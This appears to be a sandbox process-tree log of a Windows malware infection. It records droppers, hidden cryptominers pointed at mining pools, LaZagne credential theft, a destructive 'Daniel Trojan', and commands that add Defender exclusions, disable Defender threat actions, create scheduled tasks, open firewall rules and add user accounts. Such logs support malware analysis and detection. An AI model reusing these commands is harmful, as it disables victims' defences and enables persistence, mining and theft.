C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"4⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp"C:\Users\Admin\AppData\Local\Temp\is-G18NN.tmp\W4FuyPZb1bRPwxjAPdQQa3X6.tmp" /SL5="$3061C,140559,56832,C:\Users\Admin\Pictures\W4FuyPZb1bRPwxjAPdQQa3X6.exe"5⤵PID:8016
-
-
-
C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe"C:\Users\Admin\Pictures\vwgwACrMaR9zvWroL7G8qdZP.exe"4⤵PID:7648
-
C:\Users\Admin\AppData\Local\Temp\7zS75FC.tmp\Install.exe.\Install.exe5⤵PID:7144
-
C:\Users\Admin\AppData\Local\Temp\7zS1048.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:4584
-
-
-
-
C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe"C:\Users\Admin\Pictures\DliT9f9gXbeoJkiIb7GAZgOS.exe"4⤵PID:6328
-
C:\Users\Admin\AppData\Local\Temp\7zSF723.tmp\Install.exe.\Install.exe5⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\7zS8D1A.tmp\Install.exe.\Install.exe /UdidKIT "385118" /S6⤵PID:6704
-
-
-
-
C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe"C:\Users\Admin\Pictures\iFJ5E5msoFtA6RkAVJYCTniC.exe"4⤵PID:7760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\south.exe"C:\Users\Admin\AppData\Local\Temp\Files\south.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3640
-
-
C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"C:\Users\Admin\AppData\Local\Temp\Files\smell-the-roses.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2252
-
-
C:\Users\Admin\AppData\Local\Temp\Files\YT.exe"C:\Users\Admin\AppData\Local\Temp\Files\YT.exe"2⤵PID:3456
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:5100
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵PID:1108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC3CA.tmp.bat""3⤵PID:1584
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵PID:1668
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵PID:2504
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵PID:3920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"2⤵PID:2512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \3⤵PID:5084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:1560
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:4660
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:6124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \4⤵PID:5292
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe"C:\Users\Admin\AppData\Local\Temp\Files\macheri.exe"2⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"2⤵PID:6060
-
C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"3⤵PID:2364
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe"C:\Users\Admin\AppData\Local\Temp\Files\ajajjajajaj.exe"2⤵PID:6052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\portBrowserWebFontwin\Wpqih7cz6fMRtU.vbe"3⤵PID:3464
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\portBrowserWebFontwin\l1IRr8npYRL3m1TwDlV7BI8krChTb4.bat" "4⤵PID:3516
-
C:\portBrowserWebFontwin\componentwin.exe"C:\portBrowserWebFontwin/componentwin.exe"5⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\qemu-ga.exe'6⤵PID:4332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'6⤵PID:4700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\ShellExperienceHost.exe'6⤵PID:6960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hypersavesIntoRuntime\p5DlgEMx5gYcoGktfGFhOQrx.exe'6⤵PID:5808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\conhost.exe'6⤵PID:6948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RrF7ZgKlAD.bat"6⤵PID:6188
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:1172
-
-
image path | command line | level | PID
C:\Windows\system32\w32tm.exe | w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 | level 7 | PID:6712
C:\Recovery\WindowsRE\conhost.exe | "C:\Recovery\WindowsRE\conhost.exe" | level 7 | PID:7916
C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe | "C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe" | level 2 | PID:5400
C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E83.tmp\6E84.tmp\6E85.bat C:\Users\Admin\AppData\Local\Temp\Files\SystemCrasher_ByDaniel.exe" | level 3 | PID:4900
C:\Windows\system32\calc.exe | calc | level 4 | PID:5292
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:4404
C:\Windows\explorer.exe | explorer | level 4 | PID:5496
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:5836
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:5412
C:\Windows\system32\mspaint.exe | mspaint | level 4 | PID:6120
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:6108
C:\Windows\system32\write.exe | write | level 4 | PID:6248
C:\Program Files\Windows NT\Accessories\wordpad.exe | "C:\Program Files\Windows NT\Accessories\wordpad.exe" | level 5 | PID:6616
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:7072
C:\Windows\system32\write.exe | write | level 4 | PID:3168
C:\Program Files\Windows NT\Accessories\wordpad.exe | "C:\Program Files\Windows NT\Accessories\wordpad.exe" | level 5 | PID:4656
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:7204
C:\Windows\system32\write.exe | write | level 4 | PID:5720
C:\Program Files\Windows NT\Accessories\wordpad.exe | "C:\Program Files\Windows NT\Accessories\wordpad.exe" | level 5 | PID:1168
C:\Windows\system32\msg.exe | msg * Looks Your OS Has Been Trashed By The Daniel Trojan Malware. Make Sure Have Fun And Enjoy Your System Destroyed! -Daniel | level 4 | PID:7852
C:\Windows\system32\control.exe | control | level 4 | PID:6276
C:\Windows\system32\net.exe | net user DANIEL TROJAN /add | level 4 | PID:7440
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user DANIEL TROJAN /add | level 5 | PID:6952
C:\Windows\system32\net.exe | net user 4054 /add | level 4 | PID:1100
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user 4054 /add | level 5 | PID:428
C:\Users\Admin\AppData\Local\Temp\Files\route.exe | "C:\Users\Admin\AppData\Local\Temp\Files\route.exe" | level 2 | PID:4016
C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\hypersavesIntoRuntime\kwfdnN25sFO9XG48EjXTqioFlqF9.vbe" | level 3 | PID:352
C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\hypersavesIntoRuntime\xWSvEstqqDAQFrAa.bat" " | level 4 | PID:5416
C:\hypersavesIntoRuntime\savesinto.exe | "C:\hypersavesIntoRuntime\savesinto.exe" | level 5 | PID:5948
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' | level 6 | PID:4108
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' | level 6 | PID:2044
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' | level 6 | PID:5312
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' | level 6 | PID:2728
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' | level 6 | PID:5292
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' | level 6 | PID:5952
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' | level 6 | PID:2076
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/portBrowserWebFontwin/' | level 6 | PID:5524
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' | level 6 | PID:5816
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/' | level 6 | PID:1896
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/hypersavesIntoRuntime/' | level 6 | PID:6124
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' | level 6 | PID:6092
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' | level 6 | PID:1800
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' | level 6 | PID:4832
C:\Windows\it-IT\wscript.exe | "C:\Windows\it-IT\wscript.exe" | level 6 | PID:6176
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c8f9d8a9-4875-475d-98b1-691b432f278e.vbs" | level 7 | PID:7120
C:\Windows\it-IT\wscript.exe | C:\Windows\it-IT\wscript.exe | level 8 | PID:4160
C:\Windows\System32\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c963dd6f-5a58-462d-95df-8f0eafca22c1.vbs" | level 7 | PID:6500
C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe | "C:\Users\Admin\AppData\Local\Temp\Files\lazagne.exe" | level 2 | PID:8092
C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe | "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe" | level 2 | PID:5896
C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp | "C:\Users\Admin\AppData\Local\Temp\is-8110T.tmp\tuc2.tmp" /SL5="$202E4,4469003,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc2.exe" | level 1 | PID:2880
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe | level 1 | PID:4368
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | level 2 | PID:536
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --donate-level 1 -o de.zephyr.herominers.com:1123 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p workwork -a rx/0 -k --max-cpu-usage=50 | level 3 | PID:2976
C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp | "C:\Users\Admin\AppData\Local\Temp\is-06377.tmp\TNfnHRHCUJXtDWynapeSxFlf.tmp" /SL5="$2038A,4472587,54272,C:\Users\Admin\Pictures\TNfnHRHCUJXtDWynapeSxFlf.exe" | level 1 | PID:4296
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe | "C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -i | level 2 | PID:1784
C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe | "C:\Users\Admin\AppData\Local\Bitrix Report LIB\bitrixreportlib.exe" -s | level 2 | PID:1252
C:\Windows\SysWOW64\net.exe | "C:\Windows\system32\net.exe" helpmsg 1102 | level 2 | PID:2284
C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 helpmsg 1102 | level 1 | PID:5064
C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes | level 1 | PID:4676
  - Modifies Windows Firewall
C:\Windows\system32\netsh.exe | netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes | level 1 | PID:824
  - Modifies Windows Firewall
C:\Windows\windefender.exe | C:\Windows\windefender.exe | level 1 | PID:2340
C:\Windows\SysWOW64\cmd.exe | cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | level 1 | PID:5084
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 | level 1 | PID:316
\??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 | level 1 | PID:3620
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | level 1 | PID:4016
C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | level 2 | PID:4344
C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam | level 1 | PID:4340
C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum | level 1 | PID:4856
\??\c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc | level 1 | PID:436
C:\Windows\system32\timeout.exe | timeout 3 | level 1 | PID:2384
  - Delays execution with timeout.exe
C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe | C:\Users\Admin\AppData\Local\Temp\kgFvdrWtvTuDliNJn\QNmqfQdbJlhVwcQ\bIdidEB.exe pA /gDsite_idWIs 385118 /S | level 1 | PID:4608
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;" | level 2 | PID:4120
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | level 3 | PID:3172
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 | level 3 | PID:1208
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 | level 3 | PID:4400
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 | level 3 | PID:4424
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 | level 3 | PID:2744
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 | level 3 | PID:3896
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 | level 3 | PID:2012
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 | level 3 | PID:1904
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 | level 3 | PID:1744
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64 | level 3 | PID:4896
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64 | level 3 | PID:3188
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64 | level 3 | PID:3384
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32 | level 3 | PID:3052
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32 | level 3 | PID:1880
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32 | level 3 | PID:220
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64 | level 3 | PID:4900
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 | level 3 | PID:3480
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 | level 3 | PID:1676
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 | level 3 | PID:3104
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 | level 3 | PID:4000
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 | level 3 | PID:2796
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 | level 3 | PID:2832
